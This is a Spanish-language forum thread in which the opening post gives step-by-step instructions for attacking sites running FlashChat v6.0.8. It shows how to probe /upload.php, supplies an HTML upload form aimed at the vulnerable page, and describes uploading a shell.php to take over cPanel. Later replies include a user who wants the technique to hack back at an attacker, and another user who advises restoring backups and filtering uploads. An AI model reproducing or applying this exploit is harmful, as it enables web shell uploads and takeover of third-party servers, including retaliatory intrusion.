FlashChat v6 0 8 Hack /upload.php

Iniciado por andygrimm, 2 Abril 2014, 06:19 AM

0 Miembros y 2 Visitantes están viendo este tema.

andygrimm

NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.

1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable.

2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo:
<form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html.

3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel.

Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte!
By andygrimm

Simbita201

Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2

engel lex

Cita de: Simbita201 en  3 Junio 2014, 17:29 PM
Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2

>.> en serio? eso lo haces tu
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Simbita201

no tengo ni idea, me hachearon el chat y lo intnto recuperar

salu2

engel lex

Metete a tu server, borra todo y monta tu respaldo
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.


Simbita201

Cita de: engel lex en  4 Junio 2014, 01:13 AM
Metete a tu server, borra todo y monta tu respaldo

Gracias amigo.
No es la primera vez que me lo hace el mismo individuo, trato de saber recuperarlo, a su estilo, para demostrarle que puedo hacerlo y que me deje en paz.

Salu2

Simbita201

Cita de: Sh4k4 en  4 Junio 2014, 08:38 AM
atasquece..

Muchas Gracias, lo intentare, solo es cuestión de mostrarle al que me hachea, que tb soy capaz de hacerlo, espero asi se olvide de mi.

Salu2

engel lex

??? o suena a una excusa! XD puedes colocar un filtro en esa parte del sistema ya que sabes por donde sube y listo adíos ataque shell... es uno de los ataque más faciles de bloquear! XD
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Simbita201

#9
Si supiera hacer esas cosas, con el priemer ataque me hubiera bastado, lo habría solucionado.

Gracias

Edito. Gracias Engel, no me ha funcionado, error 404

sañu2